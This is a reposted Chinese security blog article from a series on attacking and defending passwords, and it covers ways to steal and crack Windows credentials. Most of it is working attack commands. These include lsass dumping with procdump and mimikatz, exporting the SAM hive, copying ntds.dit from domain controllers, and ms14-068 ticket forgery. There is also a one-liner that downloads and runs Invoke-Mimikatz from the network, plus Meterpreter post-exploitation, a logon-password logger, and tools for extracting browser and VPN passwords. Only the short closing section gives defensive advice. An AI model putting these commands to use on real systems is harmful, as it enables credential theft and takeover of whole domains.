密码系列攻防文章连载2:物理接触获取并破解windows系统密码

admin 2022年6月2日07:46:48评论40 views字数 6805阅读22分41秒阅读模式

很多人认为个人计算机比较安全,因为给计算机设置了密码,外人不知道设置的密码,因此也就安全了,其实里面很大的误解,个人计算机安全除了设置密码强健程度以外,还需要设置禁用光盘启动,禁止修改BIOS下面介绍密码相关知识,了解这些将有助于防范黑客攻击和资料外泄。

1.2.1Windows密码获取思路

windows系统密码获取有多种方式,下面对获取windows密码的思路进行总结:

1.通过0day直接获取权限,然后通过wce等工具获取明文或者哈希值,比如ms08067,通过溢出直接获取system权限,虽然现在越来越少,但现实中还是存在,比如最近的iis webdavms017-010溢出漏洞。

2.通过网站漏洞获取webshell后,通过系统存在漏洞提权,获取权限后再获取系统密码以及哈希值。

3.内网环境可以通过ntscan等工具进行扫描,暴力破解获取。

4.本地物理接触获取。通过livecdPE盘等工具,启动系统后,直接读取系统文件,将config文件夹全部复制,然后进行哈希值提取并暴力破解之。

1.2.2密码哈希值获取工具

1.gethash

insidepro.com公司早期开发的提取密码工具,最新版本1.6,目前已经停止更新工具saminside可以获取。

2.gsecdump

   gsecdump目前版本为v2.0b5,由于其使用的广泛性,因此被google浏览器以及杀毒软件定义为病毒,官方网站已经不提供下载地址,可以给官方([email protected])发邮件索取。

3.QuarksPwDump 

Quarks PwDumpquarkslab出品的一款用户密码提取开源工具,目前软件最新版本为0.2b,其完整源代码可以从https://github.com/quarkslab/quarkspwdump获取,目前它支持Windows XP/2003/Vista/7/2008版本,且相当稳定。可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker

4.pwdump

Pwdump4.02版本中有两个文件,一个是Pwd4.dll,另外一个是Pwdump4.exe,在早期版本中其dll文件为lsaext.dll

5.mimikatz

Mimikatz法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012操作系统的明文密码闻名于渗透测试,可以说是渗透必备工具,从早期1.0版本到现在的2.1.1 20180205版本功能得到了很大的提升扩展,最新版下载地址:https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20180205/mimikatz_trunk.zip

6. Windows Credentials Editor (WCE)

WCE是一款功能强大的windows平台内网渗透工具,它可以列举登陆会话,并且可以添加、改变和删除相关凭据(例如:LM/NT hashes)。这些功能在内网渗透中能够被利用,例如,在windows平台上执行绕过hash或者从内存中获取NT/LM hashes(也可以从交互式登陆、服务、远程桌面连接中获取)以用于进一步的攻击。,而且体积也非常小,是内网渗透手必备工具。https://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip

https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip

https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip

7.reg命令导出到文件

   通过执行reg命令将samsystemsecurity文件内容导出到文件。

reg save hklmsam sam.hive

reg save hklmsystem system.hive

reg save hklmsecurity security.hive

8.procdump.exe +mimikatz

procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits

procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits

sekurlsa::minidump lsass.dmp

mimikatz # sekurlsa::logonPassword

1.2.3密码获取方法

1.物理接触获取密码

通过将Ophcrack liveCDhttp://ophcrack.sourceforge.net/download.php?type=livecd)BT5、kaliPE等制作启动光盘或者启动U盘,启动系统后将系统目录下的config文件下SAMSECURITY文件复制出来。通过saminside导入即可进行破解。

2.前面提及工具密码获取方法

1gethash $local

2gsecdump –a

3QuarksPwDump

QuarksPwDump -dhl  导出本地哈希值

QuarksPwDump –dhdc 导出内存中的域控哈希值

QuarksPwDump -dhd  导出域控哈希值,必须指定NTDS文件

4pwd4 /l /o:filename.sam

5mimikatz

privilege::debug

sekurlsa::logonpasswords

6wce a

3.域控密码获取

1gsecdump

gsecdump s >all.txt

2QuarksPwDump

ntdsutil  snapshot  "activate  instance  ntds"  create  quit  quit//创建快照

ntdsutil  snapshot  "mount {GUID}"  quit  quit // Ntdsutil挂载活动目录的快照

copy  MOUNT_POINTwindowsNTDSntds.dit  c:ntds.dit //复制快照的本地磁盘

ntdsutil  snapshot  "unmount {GUID}"  quit  quit //卸载快照

ntdsutil  snapshot  "delete {GUID}"  quit  quit //删除快照

QuarksPwDump.exe --dump-hash-domain --ntds-file c:ntds.dit //提权文件hash

注意获取哈希值最好都在同一台服务器上执行,也即将QuarksPwDump.exe直接放在导出ntds.dit服务器上,执行导出命令。如果仅仅将ntds.dit复制后下载本地可能会出现无法读取错误。如果是想下载ntds.dit到本地恢复还需要执行“reg save hklmsystem system.hive”,将system.hiventds.dit全部复制到本地进行域控密码获取。网上也曾经出现一个NTDS.dit密码快速提取工具ntdsdump,使用命令来快速提取:

NTDSDump.exe -f ntds.dit -s SYSTEM -o Hash.txt

3使用ms14-068漏洞攻击域控服务器获取域控权限

ms14-068.exe -u -p -s –d 生成伪造缓存test.ccache,然后通过mimikatz导入test.ccache

kerberos::ptc test.ccache

net use命令获取域控权限

net use \A-EE64804.TEST.LOCAL

dir \A-EE64804.TEST.LOCALc$

通过前面的方法来获取域控密码。

4.使用winlogonhack获取系统密码

   安装winlogonhack记录程序,记录3389登录密码到系统目录下的boot.dat文件

5使用ps1批量获取windows密码

Windows2008及以上操作系统中执行命令:

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

注意:获取密码的计算机必须能够访问raw.githubusercontent.com网络,也可以将该ps文件下载到其他地址,然后替换后执行.

6.msf获取反弹的shell获取密码。

1getuid 获取当前帐号为系统权限,则进行后续操作,否则通过ps命令去获取小于1000以内的pid,执行migrate pid来提升权限,继续执行后续步骤。

2load mimikatz

3运行mimikatz下面的凭证获取命令

  kerberos   获取网络认证协议凭证,其中可能会有明文密码

  msv        获取msv 凭证,其中包含LMNTLM哈希密码值

  wdigest    获取wdigest 摘要式身份验证凭证,其中可能会有明文密码

4还可以执行hashdump来导出系统的哈希密码

7. iis7配置文件密码读取

mimikatz.exe privilege::debug log "iis::apphost /in:"%systemroot%system32inetsrvconfigapplicationHost.config" /live" exit

8.vpn密码获取

mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

9.openvpn配置及其密码

   发现安装有OpenVPN,可以将其配置文件夹config全部复制到本地,重新覆盖后可以只用其key和密码或者密钥进行登录如图1所示。

密码系列攻防文章连载2:物理接触获取并破解windows系统密码

1复制vpn配置文件

10.windows浏览器EMail、远程桌面等密码获取工具

nirsoft 公司(http://www.nirsoft.net/password_recovery_tools.html提供很多的免费密码获取工具所有工具包http://www.nirsoft.net/packages/passrecenc.zip压缩文件密码:nirsoft123!

1mail密码获取工具mailpv

http://www.nirsoft.net/toolsdownload/mailpv.zip

2msn密码获取工具mspass

http://www.nirsoft.net/toolsdownload/ mspass.zip

3IE密码获取工具IEpassview,执行效果如图2所示内网个人或者服务器上比较有用可以获取内网一些cms登录记录的密码。http://www.nirsoft.net/toolsdownload/iepv.zip

密码系列攻防文章连载2:物理接触获取并破解windows系统密码

2IE密码记录获取

4Outlook密码获取工具pst_password

http://www.nirsoft.net/toolsdownload/pstpassword.zip

5FoxfireChromeopera浏览器密码获取工具passwordfoxchromepass

http://www.nirsoft.net/toolsdownload/passwordfox.zip

http://www.nirsoft.net/toolsdownload/passwordfox-x64.zip

http://www.nirsoft.net/toolsdownload/chromepass.zip

http://www.nirsoft.net/toolsdownload/operapassview.zip

http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip

6无线网络密码获取工具

http://www.nirsoft.net/toolsdownload/wirelesskeyview-x64.zip

http://www.nirsoft.net/toolsdownload/wirelesskeyview.zip

7远程桌面密码获取工具rdpv

http://www.nirsoft.net/toolsdownload/rdpv.zip

cmdkey /list 查看3389可信任链接使用netpass.exe即可知道密码

8vnc密码获取工具

http://www.nirsoft.net/toolsdownload/vncpassview.zip

11.数据库密码获取

   可以通过分析网站源代码从数据库配置文件例如conn.phpweb.configconfig.php等文件中获取数据库账号、密码及服务器IP地址。

12.使用cain等工具进行嗅探

  使用cain工具内网进行精确嗅探,可以嗅探各种密码嗅探时间不宜过长,否则因为流量异常容易被发现。

1.2.4物理接触获取密码方法

   对于上班的个人计算机,如果BIOS设置安全验证和禁止光盘、网络和U启动,入侵者可以通过物理接触计算机,窃取个人计算机资料。

1.获取系统samsystem文件

通过livecdBT5Kaliophcrack等工具盘,启动系统后,将windowssystem32config文件夹下的SAMSYSTEMSECURITY文件复制出来,如图3所示。

密码系列攻防文章连载2:物理接触获取并破解windows系统密码

3复制sam、securitysecurity文件

2.导入samsystem和文件

   使用saminside工具软件,选择导入samsecuritysystem文件,即从File中选择第一个选项,如图4所示,分别选择samsecuritysystem文件,其NTLM哈希值就出来了。

密码系列攻防文章连载2:物理接触获取并破解windows系统密码


4获取用户密码哈希值

3.使用ophcrack进行密码破解

   选择需要破解的密码哈希值,将其导出,然后单独复制需要破解的哈希值,在本例中为:

Administrator:500:E7108C208C467BF789985C6892014BB8:981A05EBA7EA97FA5E776705E985D15A:管理计算机(::将该值复制到ophcrack中进行破解,如图5所示。

 

密码系列攻防文章连载2:物理接触获取并破解windows系统密码


5使用ophcrack进行暴力破解

4.通过网站在线破解

LM哈希值和NT哈希值复制到网站http://www.objectif-securite.ch/ophcrack.php进行破解,如图6所示,直接就出来了,密码为mmd-333cyx

密码系列攻防文章连载2:物理接触获取并破解windows系统密码

 

6通过网站在线破解

1.2.5个人计算密码安全防范方法和措施

通过笔者研究,可以通过以下一些方法和措施来加强个人计算机安全

1.安装杀毒软件及时更新病毒库,并设置病毒保护密码。该密码无法清除杀毒软件查杀的病毒

2.设置强健的密码。目前14位以下的密码,通过ophcrack可以快速进行破解,建议设置超过14位以上的字母大小+数字+特殊字符的密码可以是一句话的首字母加大小写加特殊字符加世界

3.设置BIOS禁止硬盘外地其方式启动,也即禁止从网络、光盘和优盘启动。

4.进入系统设置两道关口,第一道是BIOS进入密码,第二次是系统设置的密码。


1.《网络攻防实战研究:MySQL数据库攻击与防御》京东购买地址:https://item.jd.com/12743208.html

2.《Web服务器渗透实战技术》京东购买地址:https://item.jd.com/12707216.html

3.《sqlmap从入门到精通》京东购买地址:https://item.jd.com/12671154.html

4.个人网站:www.antian365.com


--------------------------------
密码系列攻防文章连载2:物理接触获取并破解windows系统密码
欢迎关注玄魂工作室
------------


扫码加活动群秘书,回复“安全”进入活动群,参与抽奖活动,赢取大奖

密码系列攻防文章连载2:物理接触获取并破解windows系统密码


使用Ophcrack破解系统Hash密码

使用winlogonhack获取系统密码

Mimikatz获取系统密码攻防研究

原文始发于微信公众号(玄魂工作室):密码系列攻防文章连载2:物理接触获取并破解windows系统密码

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月2日07:46:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   密码系列攻防文章连载2:物理接触获取并破解windows系统密码http://cn-sec.com/archives/783160.html

发表评论

匿名网友 填写信息